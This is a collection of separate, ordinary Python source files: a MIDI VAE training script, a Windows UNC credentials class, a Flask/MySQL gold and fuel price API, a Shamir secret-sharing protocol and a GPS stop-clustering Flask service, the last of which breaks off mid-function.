@author: prang
Usage:
train.py [-h | --help]
train.py [--version]
train.py [--gpu] [--gpudev GPUDEVICE] [--lr LR] [--maxiter MITER]
[--runname RNAME] [--inputrep REP] [--path P] [--bsize BSIZE]
[--nbframe NBFRAME] [--o OUT] [--save]
Options:
-h --help Show this helper
--version Show version and exit
--gpu Use GPU or not [default: False]
--gpudev GPUDEVICE Which GPU will be use [default: 0]
--lr LR Initial learning rate [default: 1e-4]
--maxiter MITER Maximum number of updates [default: 50]
--runname RNAME Set the name of the run for tensorboard [default: default_run]
--inputrep REP Set the representation which will be used as input [default: midilike]
--path P The path of the MIDI files folder (with a test and train folder) \
[default: /fast-1/mathieu/datasets/Chorales_Bach_Proper_with_all_transposition].
--bsize BSIZE Batch size [default: 16]
--nbframe NBFRAME Number of frames per bar [default: 16]
--o OUT Path of the output directory [default: None]
--save Save the models during the training or not [default: True]
"""
import torch
import representations as rep_classes
import models as m
from tensorboardX import SummaryWriter
from docopt import docopt
from tqdm import tqdm
import os
# Useful functions
def increase_wkl(epoch, w_kl, input_rep):
    """Return the KL-annealing weight for the next epoch.

    Every 10 epochs the weight is bumped by a representation-specific
    increment. The pianoroll schedule uses a smaller step (1e-5) during
    epochs 1-149 and 1e-4 otherwise; the other representations skip epoch 0.
    Unknown representations leave the weight unchanged.
    """
    bump_epoch = epoch % 10 == 0
    if input_rep == "pianoroll":
        if 0 < epoch < 150:
            if bump_epoch:
                w_kl += 1e-5
        elif bump_epoch:
            w_kl += 1e-4
        return w_kl
    increments = {
        "midilike": 1e-8,
        "signallike": 1e-8,
        "midimono": 1e-4,
        "notetuple": 1e-6,
    }
    if input_rep in increments and bump_epoch and epoch > 0:
        w_kl += increments[input_rep]
    return w_kl
# Load arguments from the shell command with docopt
if __name__ == '__main__':
    # Fix: the script body is now indented under the __main__ guard so the
    # guard actually prevents execution on import (it was a no-op before).
    arguments = docopt(__doc__, version='symbolic_embeddings v1.0')
    print(arguments)
    if torch.cuda.is_available() and not arguments['--gpu']:
        print("WARNING: You have a CUDA device, so you should probably run with --gpu")
    # Set GPU device and backend.
    # NOTE(review): docopt boolean flags are False unless passed on the command
    # line; the "[default: True]" annotations on --save do not take effect.
    if arguments['--gpu']:
        torch.backends.cudnn.benchmark = True
        torch.cuda.set_device(int(arguments['--gpudev']))
    # Anomaly detection is expensive; useful while debugging NaNs in backward.
    torch.autograd.set_detect_anomaly(True)
    # Parameters
    train_path = arguments['--path'] + '/train'
    test_path = arguments['--path'] + '/test'
    batch_size = int(arguments['--bsize'])
    nb_frame = int(arguments['--nbframe'])
    if arguments['--o'] == 'None':
        output_dr = os.getcwd() + '/output'
    else:
        output_dr = arguments['--o']
    # Load the dataset; each representation defines its own input dimension.
    if arguments['--inputrep'] == "pianoroll":
        dataset = rep_classes.Pianoroll(train_path, nbframe_per_bar=nb_frame)
        testset = rep_classes.Pianoroll(test_path, nbframe_per_bar=nb_frame)
        input_dim = 128
        seq_length = nb_frame
    elif arguments['--inputrep'] == "midilike":
        dataset = rep_classes.Midilike(train_path)
        testset = rep_classes.Midilike(test_path)
        input_dim = 1
    elif arguments['--inputrep'] == "midimono":
        dataset = rep_classes.Midimono(train_path)
        testset = rep_classes.Midimono(test_path)
        input_dim = 1
    elif arguments['--inputrep'] == "signallike":
        dataset = rep_classes.Signallike(train_path, nbframe_per_bar=nb_frame*2, mono=True)
        testset = rep_classes.Signallike(test_path, nbframe_per_bar=nb_frame*2, mono=True)
        input_dim = dataset.signal_size//64
    elif arguments['--inputrep'] == "notetuple":
        dataset = rep_classes.Notetuple(train_path)
        # Bug fix: the test set previously used rep_classes.NoteTupleRepresentation,
        # a different class from the train set; use the same class for both.
        testset = rep_classes.Notetuple(test_path)
        input_dim = 5
    else:
        raise NotImplementedError("Representation {} not implemented".format(arguments['--inputrep']))
    # Init the dataloaders
    data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, num_workers=1,
                                              pin_memory=True, shuffle=True, drop_last=True)
    test_loader = torch.utils.data.DataLoader(testset, batch_size=batch_size, num_workers=1,
                                              pin_memory=True, shuffle=True, drop_last=True)
    # Init writer for tensorboard
    writer = SummaryWriter(output_dr + '/runs/' + arguments['--runname'])
    # Model parameters
    enc_hidden_size = 1024
    cond_hidden_size = 1024
    dec_hidden_size = 1024
    cond_outdim = 512
    num_layers_enc = 2
    num_layers_dec = 2
    num_subsequences = 4
    latent_size = 256
    # Output dimension and sequence length depend on the representation.
    if arguments['--inputrep'] in ['pianoroll', 'signallike']:
        output_dim = input_dim
        if arguments['--inputrep'] == 'pianoroll':
            seq_length = 16
        else:
            seq_length = 64
    elif arguments['--inputrep'] == "midilike":
        output_dim = len(dataset.vocabulary)
        seq_length = 64
    elif arguments['--inputrep'] == "midimono":
        output_dim = 130
        seq_length = 16
    elif arguments['--inputrep'] == "notetuple":
        output_dim = sum([len(v) for v in dataset.vocabs]) + 129
        seq_length = 32
    # Instantiate model
    encoder = m.Encoder_RNN(input_dim, enc_hidden_size, latent_size, num_layers_enc)
    decoder = m.Decoder_RNN_hierarchical(output_dim, latent_size, cond_hidden_size,
                                         cond_outdim, dec_hidden_size, num_layers_dec,
                                         num_subsequences, seq_length)
    model = m.VAE(encoder, decoder, arguments['--inputrep'])
    # Reconstruction loss: MSE for continuous representations, CE for categorical ones.
    if arguments['--inputrep'] in ['pianoroll', 'signallike']:
        loss_fn = torch.nn.MSELoss(reduction='sum')
    else:
        loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    # Move to GPU
    if arguments['--gpu']:
        loss_fn = loss_fn.cuda()
        model = model.cuda()
    # Optimizer
    optimizer = torch.optim.Adam(model.parameters(), lr=float(arguments['--lr']))
    # Start training
    loss_test_min_reconst = 10e6
    w_kl = 0
    for epoch in range(int(arguments['--maxiter'])):
        print('epoch : ' + str(epoch))
        #### Train ####
        loss_mean = 0
        kl_div_mean = 0
        reconst_loss_mean = 0
        nb_pass = 0
        model.train()
        for i, x in tqdm(enumerate(data_loader), total=len(dataset)//batch_size):
            if arguments['--gpu']:
                # notetuple batches are (tokens, lengths) pairs; move both.
                if arguments['--inputrep'] == "notetuple":
                    x[0] = x[0].cuda()
                    x[1] = x[1].cuda()
                else:
                    x = x.cuda()
            # Training pass
            loss, kl_div, reconst_loss = model.batch_pass(x, loss_fn, optimizer,
                                                          w_kl, dataset)
            loss_mean += loss
            kl_div_mean += kl_div
            reconst_loss_mean += reconst_loss
            nb_pass += 1
        # Increase the KL weight following its annealing schedule.
        w_kl = increase_wkl(epoch, w_kl, arguments['--inputrep'])
        #### Test ####
        loss_mean_TEST = 0
        kl_div_mean_TEST = 0
        reconst_loss_mean_TEST = 0
        nb_pass_TEST = 0
        model.eval()
        with torch.no_grad():
            for i, x in tqdm(enumerate(test_loader), total=len(testset)//batch_size):
                if arguments['--gpu']:
                    if arguments['--inputrep'] == "notetuple":
                        x[0] = x[0].cuda()
                        x[1] = x[1].cuda()
                    else:
                        x = x.cuda()
                # Testing pass (no optimizer step, test=True)
                loss, kl_div, reconst_loss = model.batch_pass(x, loss_fn, optimizer,
                                                              w_kl, dataset, test=True)
                loss_mean_TEST += loss
                kl_div_mean_TEST += kl_div
                reconst_loss_mean_TEST += reconst_loss
                nb_pass_TEST += 1
        #### Add to tensorboard ####
        print("adding stuff to tensorboard")
        both_loss = {}
        both_loss['train'] = loss_mean/nb_pass
        both_loss['test'] = loss_mean_TEST/nb_pass_TEST
        writer.add_scalar('data/loss_mean', loss_mean/nb_pass, epoch)
        writer.add_scalar('data/kl_div_mean', kl_div_mean/nb_pass, epoch)
        writer.add_scalar('data/reconst_loss_mean', reconst_loss_mean/nb_pass, epoch)
        writer.add_scalar('data/loss_mean_TEST', loss_mean_TEST/nb_pass_TEST, epoch)
        writer.add_scalar('data/kl_div_mean_TEST', kl_div_mean_TEST/nb_pass_TEST, epoch)
        writer.add_scalar('data/reconst_loss_mean_TEST', reconst_loss_mean_TEST/nb_pass_TEST, epoch)
        writer.add_scalars('data/Losses', both_loss, epoch)
        #### Save the model ####
        if arguments['--save']:
            # Keep only checkpoints that improve the best test loss, after a warm-up.
            if epoch > 50 and loss_mean_TEST < loss_test_min_reconst:
                loss_test_min_reconst = loss_mean_TEST
                torch.save(model.cpu().state_dict(),
                           output_dr + '/models/' + arguments['--runname'] + '_epoch_' + str(epoch+1) + '.pth')
                # model.cpu() moved the parameters; move them back for the next epoch.
                if arguments['--gpu']:
                    model = model.cuda()
    # End of the script, close the writer
    writer.close()
|
"""
Class and functions for dealing with credentials in UNC connections on Windows.
"""
from win_unc.errors import InvalidUsernameError
from win_unc.cleaners import clean_username
from win_unc.validators import is_valid_username
class UncCredentials(object):
    """
    Represents a set of credentials to be used with a UNC connection. Credentials include a
    username and a password.
    """

    def __init__(self, username=None, password=None):
        r"""
        Returns a new `UncCredentials` object. Both `username` and `password` are optional.
        If neither are provided, the new object will mean that credentials are unnecessary.
        `username` must be a string representing a Windows username (logon). Windows usernames
        may include a domain prefix (i.e. "domain\username"). If `username` cannot be
        construed as a valid Windows username, then this will raise an
        `InvalidUsernameError`.
        Note: UNC connections that require authentication will use the username of the
              currently logged in Windows user unless specifically provided another
              username.
        Note: Providing `None` and `''` (the empty string) have very different meanings.
              Usernames cannot be empty.
        `password` must be a string representing a password.
        Note: Providing `None` and `''` (the empty string) have very different meanings.
              The empty string is a meaningful, legitimate password.
        If only the first positional argument is provided and it is already an instance of the
        `UncCredentials` class (either directly or by inheritance), this constructor will clone
        it and create a new `UncCredentials` object with the same properties.
        """
        if password is None and isinstance(username, self.__class__):
            # Clone constructor: copy the other instance's state.
            new_username = username._username
            new_password = username._password
        else:
            new_username = username
            new_password = password
        cleaned_username = clean_username(new_username) if new_username is not None else None
        if cleaned_username is None or is_valid_username(cleaned_username):
            self._username = cleaned_username
            # Bug fix: the password was assigned from an unresolved placeholder
            # token; store the password that was actually provided (or cloned).
            self._password = new_password
        else:
            raise InvalidUsernameError(new_username)

    def get_username(self):
        """
        Returns the username of this `UncCredentials` object or `None` if no username was provided.
        """
        return self._username

    def get_password(self):
        """
        Returns the password of this `UncCredentials` object or `None` if no password was provided.
        """
        return self._password

    def is_empty(self):
        """
        Returns `True` if this `UncCredentials` object does not contain any meaningful credentials.
        """
        return self._username is None and self._password is None

    def get_auth_string(self):
        """
        Returns a standard representation of these credentials as a string. The string mimics
        the HTTP Basic Authentication scheme.
        """
        if self._password is not None:
            return '{0}:{1}'.format(self._username or '', self._password)
        elif self._username:
            return self._username
        else:
            return ''

    def __eq__(self, other):
        if isinstance(other, self.__class__):
            return (self._username == other._username and self._password == other._password)
        else:
            return False

    def __ne__(self, other):
        return not self.__eq__(other)

    def __hash__(self):
        # Equal objects hash equally because str() falls back to __repr__,
        # which is derived from the auth string.
        return hash(str(self))

    def __repr__(self):
        return '<{cls}: "{str}">'.format(cls=self.__class__.__name__, str=self.get_auth_string())
def get_creds_from_string(string):
    """
    Parses a standardized string (as produced by `UncCredentials.get_auth_string`) into a new
    `UncCredentials` object and returns it. Any error that `UncCredentials`'s constructor can
    raise may also be raised here.
    """
    # Split on the first ':' only, since the password may itself contain ':'.
    username, sep, password = string.partition(':')
    if not sep:
        username, password = string, None
    return UncCredentials(username or None, password)  # Usernames cannot be `''`, but password can be.
|
import sys
import pymysql as mysql
from flask import abort
from config import OPENAPI_AUTOGEN_DIR, DB_HOST, DB_USER, DB_PASSWD, DB_NAME
sys.path.append(OPENAPI_AUTOGEN_DIR)
from openapi_server import models
def db_cursor():
    """Open a new MySQL connection and return a cursor on it.

    Note: a fresh connection is created on every call, and callers' ``with``
    blocks only close the cursor — the underlying connection is left for the
    garbage collector. Consider pooling or closing connections explicitly.
    """
    # Fix: the password argument was an unresolved placeholder token; use the
    # DB_PASSWD value imported from config like the other connection settings.
    return mysql.connect(host=DB_HOST, user=DB_USER, passwd=DB_PASSWD, db=DB_NAME).cursor()
def get_gold_price():
    """Return every gold price row as a list of ``models.Gold`` objects."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("SELECT month,times,price FROM gold")
        rows = cs.fetchall()
    return [
        models.Gold(month_names[month - 1], month, times, round(price, 2))
        for month, times, price in rows
    ]
def get_gold_price_in_month(monthId):
    """Return the gold price rows for month *monthId* as ``models.Gold`` objects."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT month, times, price
        FROM gold
        WHERE month = %s
        """, [monthId])
        rows = cs.fetchall()
    return [
        models.Gold(month_names[month - 1], month, times, round(amount, 2))
        for month, times, amount in rows
    ]
def get_average_gold_price(monthId):
    """Return the average gold price for month *monthId* as a ``models.GoldAverage``.

    Aborts with HTTP 404 when the month has no rows.
    """
    months = ['Jan','Feb','Mar','Apr','May','Jun',
              'Jul','Aug','Sep','Oct','Nov','Dec']
    with db_cursor() as cs:
        cs.execute("""
        SELECT month, AVG(price)
        FROM gold
        WHERE month = %s
        """, [monthId])
        result = cs.fetchone()
    if result:
        month = result[0]
        price = round(result[1], 2)
        # Consistency fix: get_average_monthly_gold_price builds GoldAverage as
        # (month_name, month_number, price); this endpoint passed the number first.
        return models.GoldAverage(months[month-1], month, price)
    else:
        abort(404)
def get_average_monthly_gold_price():
    """Return the average gold price per month as ``models.GoldAverage`` objects."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT month, AVG(price)
        FROM gold
        GROUP BY month
        """)
        rows = cs.fetchall()
    return [
        models.GoldAverage(month_names[month - 1], month, round(amount, 2))
        for month, amount in rows
    ]
def get_highest_gold_price():
    """Return the single row with the highest gold price."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT month, price
        FROM gold
        ORDER BY price DESC
        LIMIT 1
        """)
        rows = cs.fetchall()
    # NOTE(review): models.Gold is built with 4 args elsewhere (name, month,
    # times, price) but only 3 here — confirm the model accepts both forms.
    return [
        models.Gold(month_names[month - 1], month, round(amount, 2))
        for month, amount in rows
    ]
def get_lowest_gold_price():
    """Return the single row with the lowest gold price."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT month, price
        FROM gold
        ORDER BY price
        LIMIT 1
        """)
        rows = cs.fetchall()
    # NOTE(review): 3-arg models.Gold call, as in get_highest_gold_price —
    # confirm against the 4-arg form used by get_gold_price.
    return [
        models.Gold(month_names[month - 1], month, round(amount, 2))
        for month, amount in rows
    ]
def get_fuel():
    """Return every fuel that has at least one price row, as ``models.Fuel`` objects."""
    with db_cursor() as cs:
        cs.execute("""
        SELECT fp.fuel_id, f.fuel
        FROM fuel_price fp
        INNER JOIN fuel f ON fp.fuel_id = f.ID
        GROUP BY f.ID
        """)
        rows = cs.fetchall()
    return [models.Fuel(fuel_id, name) for fuel_id, name in rows]
def get_all_fuel_price():
    """Return every fuel price row as ``models.FuelPrice`` objects."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT fuel, month, day, price
        FROM fuel_price fp
        INNER JOIN fuel f ON f.ID = fp.fuel_id
        """)
        rows = cs.fetchall()
    return [
        models.FuelPrice(name, month, month_names[month - 1], day, round(price, 2))
        for name, month, day, price in rows
    ]
def get_fuel_price(fuelId):
    """Return the price history of fuel *fuelId*, ordered by month."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT fuel, month, day, price
        FROM fuel_price fp
        INNER JOIN fuel f ON f.ID = fp.fuel_id
        WHERE fp.fuel_id=%s
        ORDER BY month
        """, [fuelId])
        rows = cs.fetchall()
    return [
        models.FuelPrice(name, month, month_names[month - 1], day, round(price, 2))
        for name, month, day, price in rows
    ]
def get_fuel_price_by_month(monthId):
    """Return every fuel's price rows for month *monthId* as ``models.FuelDetail`` objects."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT fuel_id,fuel, month, day, price
        FROM fuel_price fp
        INNER JOIN fuel f ON f.ID = fp.fuel_id
        WHERE month=%s
        """, [monthId])
        rows = cs.fetchall()
    return [
        models.FuelDetail(fuel_id, name, month, month_names[month - 1], day, round(price, 2))
        for fuel_id, name, month, day, price in rows
    ]
def get_monthly_average_fuel_price(fuelId):
    """Return fuel *fuelId*'s average price per month, ordered by month."""
    month_names = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',
                   'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')
    with db_cursor() as cs:
        cs.execute("""
        SELECT fuel,month, AVG(price)
        FROM fuel_price fp
        INNER JOIN fuel f ON f.ID = fp.fuel_id
        WHERE fp.fuel_id = %s
        GROUP BY month
        ORDER BY month
        """, [fuelId])
        rows = cs.fetchall()
    return [
        models.FuelMonthlyAverage(name, month_names[month - 1], month, round(price, 2))
        for name, month, price in rows
    ]
def get_fuel_changing():
    """Return the number of price rows recorded for fuel_id 2.

    Aborts with HTTP 404 when the count query yields no row.
    """
    with db_cursor() as cs:
        cs.execute("""
        SELECT COUNT(price) as changing
        FROM fuel_price
        WHERE fuel_id = 2
        """)
        row = cs.fetchone()
    if row:
        return row[0]
    abort(404)
|
<gh_stars>1-10
# Copyright 2021 National Technology & Engineering Solutions
# of Sandia, LLC (NTESS). Under the terms of Contract DE-NA0003525 with NTESS,
# the U.S. Government retains certain rights in this software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functionality for working with Shamir-shared secrets."""
import numbers
import numpy
import shamir
from cicada.communicator.interface import Communicator
class ShamirArrayShare(object):
    """One player's local share of a Shamir-secret-shared array.

    Parameters
    ----------
    shape: :class:`tuple`, required
        Shape of the shared array.
    storage: :class:`object`, required
        Opaque share data, created and manipulated exclusively by
        :class:`ShamirProtocol` — off-limits to everyone else!
    """
    def __init__(self, shape, storage):
        self._shape = shape
        self._storage = storage

    def __repr__(self):
        return "cicada.shamir.ShamirArrayShare(shape={}, storage={})".format(self._shape, self._storage)  # pragma: no cover
class ShamirProtocol(object):
    """Uses a communicator to create and manipulate Shamir-secret-shared values.
    Parameters
    ----------
    communicator: :class:`cicada.communicator.interface.Communicator`, required
        The communicator that this protocol will use for collective operations.
    """
    def __init__(self, communicator):
        if not isinstance(communicator, Communicator):
            raise ValueError("A Cicada communicator is required.") # pragma: no cover
        self._communicator = communicator
    def _require_rank(self, rank, label):
        # Validate that `rank` is an integer naming an existing player, and
        # normalize it to a plain int.
        if not isinstance(rank, numbers.Integral):
            raise ValueError(f"Expected an integer for {label}, received {rank} instead.") # pragma: no cover
        if rank < 0 or rank >= self.communicator.world_size:
            raise ValueError(f"Expected {label} would be in the range [0, {self.communicator.world_size}), received {rank} instead.") # pragma: no cover
        return int(rank)
    def _require_rank_list(self, ranks, label):
        # Validate each rank individually, then reject duplicates.
        ranks = [self._require_rank(rank, label) for rank in ranks]
        if len(ranks) != len(set(ranks)):
            raise ValueError(f"Expected unique values for {label}, received {ranks} instead.") # pragma: no cover
        return ranks
    @property
    def communicator(self):
        """Returns the :class:`cicada.communicator.interface.Communicator` used by this protocol."""
        return self._communicator
    def reveal(self, share, src=None, dst=None):
        """Reconstruct a secret from its shares.
        Note
        ----
        This is a collective operation that *must* be called
        by all players that are members of :attr:`communicator`.
        Parameters
        ----------
        share: :class:`ShamirArrayShare`, or :any:`None`, required
            A local share of the secret to be revealed. This value is ignored
            if the local player isn't contributing a share.
        src: sequence of :class:`int`, optional
            List of players who will supply shares of the secret to be revealed.
            If :any:`None` (the default), all players will supply a share.
        dst: sequence of :class:`int`, optional
            List of players who will receive the revealed secret. If :any:`None`
            (the default), the secret will be revealed to all players.
        Returns
        -------
        value: :class:`numpy.ndarray` or :any:`None`
            The revealed secret, if this player is a member of `dst`,
            or :any:`None`.
        """
        # Identify who will be providing shares.
        if src is None:
            src = self.communicator.ranks
        # Identify who will be receiving shares.
        if dst is None:
            dst = self.communicator.ranks
        # Enforce preconditions.
        src = self._require_rank_list(src, "src")
        dst = self._require_rank_list(dst, "dst")
        if self.communicator.rank in src:
            if not isinstance(share, ShamirArrayShare):
                raise ValueError(f"share must be an instance of ShamirArrayShare, received {share} instead.") # pragma: no cover
        # Unpack data to exchange with the other players.
        value = (share._shape, share._storage) if self.communicator.rank in src else None
        # Send data to the other players.  One gather per recipient: every
        # player in `dst` collects one (shape, shares) pair from each provider.
        secret = None
        for recipient in dst:
            data = self.communicator.gatherv(src=src, value=value, dst=recipient)
            # If we're a recipient, recover the secret.
            if self.communicator.rank == recipient:
                shapes, shares = zip(*data)
                # Regroup the gathered data so that shares for the same array
                # element (from all providers) are contiguous.
                element_shares = numpy.array(shares).swapaxes(0, 1)
                secrets = [shamir.recover_secret(shares) for shares in element_shares]
                secret = numpy.array(secrets, dtype=object).reshape(shapes[0], order="C")
        return secret
    def share(self, *, src, secret, k, dst=None):
        """Distribute Shamir shares of a secret array.
        Note
        ----
        The input array must contain integers, and those integers
        must all be >= 0.
        This is a collective operation that *must* be called
        by all players that are members of :attr:`communicator`.
        Parameters
        ----------
        src: integer, required
            The player providing the secret array to be shared.
        secret: :class:`numpy.ndarray` or :any:`None`, required
            The secret array to be shared, which must contain integers >= 0.
            This value is ignored for all players but `src`.
        k: integer, required
            Minimum number of shares required to reveal the secret.
            Must be <= the number of players that are members of
            :attr:`communicator`.
        dst: sequence of :class:`int`, optional.
            List of players who will receive shares of the secret. If
            :any:`None` (the default), all players will receive a share.
        Returns
        -------
        share: :class:`ShamirArrayShare` or :any:`None`
            Local share of the shared secret, if this player is a member of
            `dst`, or :any:`None`.
        """
        # Identify who will be receiving shares.
        if dst is None:
            dst = self.communicator.ranks
        # Enforce preconditions.
        src = self._require_rank(src, "src")
        if self.communicator.rank == src:
            if not isinstance(secret, numpy.ndarray):
                raise ValueError(f"secret must be an instance of numpy.ndarray, received {secret} instead.") # pragma: no cover
            if not issubclass(secret.dtype.type, (numpy.integer, object)):
                raise ValueError(f"secret must contain integers, received {secret.dtype} instead.") # pragma: no cover
            if not numpy.all(secret >= 0):
                raise ValueError("secret must contain values >= 0.") # pragma: no cover
        k = int(k)
        if not (1 <= k and k <= len(dst)):
            raise ValueError(f"k must be an integer in the range [1, {len(dst)}], received {k} instead.") # pragma: no cover
        # Create a shamir share for each element in the secret.
        if self.communicator.rank == src:
            all_shares = []
            for element in secret.flat: # Returns elements in C-style (last index varies fastest) order.
                constant, shares = shamir.make_random_shares(k, len(dst))
                shares = numpy.array(shares)
                # Re-base the random polynomial's y-values so its constant term
                # (the shared secret) becomes `element` — valid because Shamir
                # shares are linear in the secret.
                shares[:,1] -= constant
                shares[:,1] += element
                all_shares.append(shares)
            all_shares = numpy.array(all_shares)
            # Regroup from per-element to per-player, so each player gets one
            # share of every element.
            all_shares = all_shares.swapaxes(0, 1)
            values = [(secret.shape, shares) for shares in all_shares]
        else:
            values = None
        # Distribute shares to all players.
        shares = self.communicator.scatterv(src=src, values=values, dst=dst)
        # Package the shares.
        return shares if shares is None else ShamirArrayShare(shares[0], shares[1])
|
<filename>app/main.py
#!flask/bin/python
# Python
import os
import requests
import json
import MySQLdb
from datetime import date, datetime, timedelta
# FLASK
from flask import Flask, jsonify, request
from flask_cors import CORS, cross_origin
# Data Science
import pandas as pd
import numpy as np
from scipy import stats
from scipy.spatial import ConvexHull
import matplotlib.pyplot as plt
from pandas import DataFrame
from sklearn.cluster import DBSCAN
from geopy.distance import great_circle, geodesic
# Para geoposicion
from shapely import affinity
from shapely.geometry import MultiPoint, Point, LinearRing, Polygon
# Declaramos el APP Flask
app = Flask(__name__)
CORS(app)
# Servidores de Mysql
sv1 = MySQLdb.connect(host="ip", port=3306,
user="USUARIO", passwd="password", db="database_name")
def calculo():
    """Compute the frequent-stop ("heat") points from raw tracking data.

    Reads GPS rows from MySQL, clusters nearby positions with DBSCAN
    (haversine metric, ~70 m radius), picks each cluster's most central
    member, attaches modal hour/plate statistics, drops clusters with fewer
    than 4 points, and writes the result to puntos.csv.
    """
    # Query the raw tracking data used to compute the frequent stops.
    sv1.ping(True)
    cur = sv1.cursor()
    cur.execute(
        """ SELECT id, plate, timestamp AS fecha, latitude as lat, longitude as lon, timeOff FROM RuteoDynamic2 WHERE timestamp>1579496400 """)
    data = cur.fetchall()
    itms = []
    for row in data:
        # 18000 s = 5 h: shifts epoch timestamps — presumably to UTC-5
        # (Peru local time); confirm the server clock is UTC.
        dtPE = row[2]-18000
        # roundDatetime is defined elsewhere in this module — rounds the
        # timestamp to 30-minute buckets before formatting as "HH.MM".
        hora = roundDatetime(datetime.fromtimestamp(
            dtPE), timedelta(minutes=30)).strftime("%H.%M")
        itms.append({
            'id': row[0],
            'plate': row[1],
            'fecha': datetime.fromtimestamp(dtPE).strftime("%d/%m/%Y %H:%M:%S"),
            'hora': float(hora),
            'lat': row[3],
            'lon': row[4]
        })
    cur.close()
    # Build a DataFrame from the query results.
    df = pd.DataFrame(itms)
    # Arrays used for the clustering (coords2 keeps hour/plate for statistics).
    coords = df[['lat', 'lon']].values
    coords2 = df[['lat', 'lon', 'hora', 'plate']].values
    # Cluster points within roughly a 70 m radius (frequent stops); eps is
    # expressed in radians for the haversine metric.
    kms_per_radian = 6371.0088
    epsilon = 0.07 / kms_per_radian
    db = DBSCAN(eps=epsilon, min_samples=1, algorithm='ball_tree',
                metric='haversine').fit(np.radians(coords))
    cluster_labels = db.labels_
    num_clusters = len(set(cluster_labels))
    clusters = pd.Series([coords[cluster_labels == n]
                          for n in range(num_clusters)])
    clusters2 = pd.Series([coords2[cluster_labels == n]
                           for n in range(num_clusters)])
    poligonos = pd.DataFrame({'poligon': clusters2})
    # Find the most central point of each cluster: the member closest to the
    # cluster's centroid (great-circle distance).
    def get_centermost_point(cluster):
        centroid = (MultiPoint(cluster).centroid.x,
                    MultiPoint(cluster).centroid.y)
        centermost_point = min(
            cluster, key=lambda point: great_circle(point, centroid).m)
        return tuple(centermost_point)
    # Map every cluster to its representative point.
    centermost_points = clusters.map(get_centermost_point)
    # Unzip into latitude and longitude sequences.
    lats, lons = zip(*centermost_points)
    # Put them in a DataFrame for further manipulation.
    rep_points = pd.DataFrame({'lat': lats, 'lon': lons})
    # Re-attach the original attributes of each representative point.
    rs = rep_points.apply(lambda row: df[(df['lat'] == row['lat']) & (
        df['lon'] == row['lon'])].iloc[0], axis=1)
    horas = []
    horas_s = []
    plates = []
    # Per-cluster statistics: modal hour, clustered time span and modal plate.
    # clusterTime is defined elsewhere in this module — confirm its contract.
    for n in range(num_clusters):
        x = pd.DataFrame(poligonos['poligon'][n])[[2]].values
        moda, count = stats.mode(poligonos['poligon'][n])
        horas.append(moda[0][2])
        horas_s.append(clusterTime(x))
        plates.append(moda[0][3])
        # print(moda)
    indice_moda = pd.DataFrame({
        'moda': horas,
        'moda_s': horas_s,
        'moda_plate': plates})
    # Final set of heat points / frequent stops, exported for the API to serve.
    datafinal = pd.concat([rs, indice_moda, poligonos],
                          axis=1).sort_values(by='moda')
    # Drop clusters that do not have at least 4 points in their polygon.
    datafinal.drop(
        datafinal[datafinal.poligon.str.len() <= 3].index, inplace=True)
    # datafinal.drop(['poligon'], axis=1)
    datafinal.to_csv('puntos.csv', header=True, index=False)
    return datafinal
@app.route('/')
def index():
    """Root endpoint: simple liveness message."""
    return jsonify({'msg': 'Api Ruteo Dynamic!'})
@app.route('/loader')
def loader():
    """Recompute the frequent-stop points and refresh puntos.csv."""
    calculo()
    return jsonify({'msg': 'Api Ruteo Dynamic, Calculo Hecho!'})
@app.route('/puntos')
def puntos():
    """Return every frequent-stop point inside the mega geofence as GeoJSON features."""
    # Points previously generated by the clustering algorithm (see calculo()).
    frecuentes = pd.read_csv('puntos.csv')
    features = []
    for _, row in frecuentes.iterrows():
        features.append({
            "type": "Feature",
            "properties": {
                "name": "Parada Frecuente",
                "moda": str(row[6]).replace(".", ":") + "0",
                "moda_s": str(row[7]).replace(".", ":") + "0",
                "moda_plate": row[8]
            },
            "geometry": {
                "type": "Point",
                "coordinates": [row[5], row[4]]
            }
        })
    return jsonify(features)
@app.route('/puntos/cda/<cda>')
def cda_n(cda):
    """Return the frequent-stop points inside a CDA's delivery area as GeoJSON.

    Builds the convex hull of the CDA's delivery-zone polygons, scales it up,
    and filters the global puntos.csv points to those inside the hull.
    """
    Export = []
    today = date.today().strftime("%d/%m/%Y")
    # Full set of points produced by the clustering algorithm.
    puntos = pd.read_csv('puntos.csv')
    # Delivery-zone polygons for this CDA; polyReparto is defined elsewhere
    # in this module — confirm its signature (route, date, cda).
